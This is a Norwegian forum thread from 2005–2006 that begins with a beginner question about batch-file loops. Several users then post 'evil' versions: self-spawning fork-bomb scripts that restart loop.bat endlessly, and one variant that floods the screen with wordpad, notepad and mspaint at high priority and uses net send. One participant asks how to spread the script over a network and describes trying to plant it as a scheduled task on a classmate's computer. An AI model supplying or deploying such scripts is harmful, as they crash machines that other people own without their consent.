thlangva Skrevet 24. februar 2005 Del Skrevet 24. februar 2005 hva er loop? har sett at det er masse snakk om det i dette forumet Lenke til kommentar
aklla Skrevet 25. februar 2005 Del Skrevet 25. februar 2005 under er det en loop: @echo off :loop echo dette er en loop goto loop dette gjør at scriptet ikke stopper, når det står goto loop så hopper den tilbake til :loop og begynner å lese derifra Lenke til kommentar
fatalicus Skrevet 25. februar 2005 Del Skrevet 25. februar 2005 (endret) her er den onde versjonen av det samme scriptet: @echo off :loop echo dette er en loop start loop.bat lagre denne med navne loop på skrivebordet så kjører du den... Endret 25. februar 2005 av fatalicus Lenke til kommentar
aklla Skrevet 25. februar 2005 Del Skrevet 25. februar 2005 hvis han legger det i all users mappa så, ting du legger på skrivbordet ditt kommer ikke dit... her er det onde scriptet som funker: @echo off :loop echo dette er en ond loop start loop.bat goto loop Lenke til kommentar
fatalicus Skrevet 25. februar 2005 Del Skrevet 25. februar 2005 my bad! rettet på det.. Lenke til kommentar
thlangva Skrevet 26. februar 2005 Forfatter Del Skrevet 26. februar 2005 hvis han legger det i all users mappa så, ting du legger på skrivbordet ditt kommer ikke dit... her er det onde scriptet som funker: @echo off :loop echo dette er en ond loop start loop.bat goto loop går det ann og lage dette som en exe fil sånn at dette skjer med alle programmene som er oppe? ikke bare at det kommer opp mange ms dos filer men feks. hvis du er inne på world så kommer det opp mange nye word dokumenter? Lenke til kommentar
-¤Zen¤- Skrevet 27. februar 2005 Del Skrevet 27. februar 2005 :loop start /high wordpad start /high notepad start /high mspaint netsend /domain 2k5 start loop.bat goto loop Lenke til kommentar
_Rønning_ Skrevet 13. mars 2006 Del Skrevet 13. mars 2006 Er det mulig å sende det scriptet med mspaint og sånn over nettverket?? har prøvd litt og jeg får den bare til meg selv. Lenke til kommentar
haakie Skrevet 13. mars 2006 Del Skrevet 13. mars 2006 Tør ikke prøve det skriptet, hva skjer? Lenke til kommentar
Gjakmarrja Skrevet 13. mars 2006 Del Skrevet 13. mars 2006 Tør ikke prøve det skriptet, hva skjer? 5747083[/snapback] Er det ikke bare et script som starter en haug med programmer, flere ganger i sekundet. ?!! Lenke til kommentar
_Rønning_ Skrevet 15. mars 2006 Del Skrevet 15. mars 2006 Jeg prøvde å legge loop skriptet i planlagte oppgaver på maskina til en i klassen min. men den vil ikke starte, det skjer ingen ting. men så tar jeg på egenskaper og da står det: "start i:" hva skal jeg skrive der+ har jo laget scripet som .bat fil så jeg aner ikke hva jeg sakl skrive der! Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå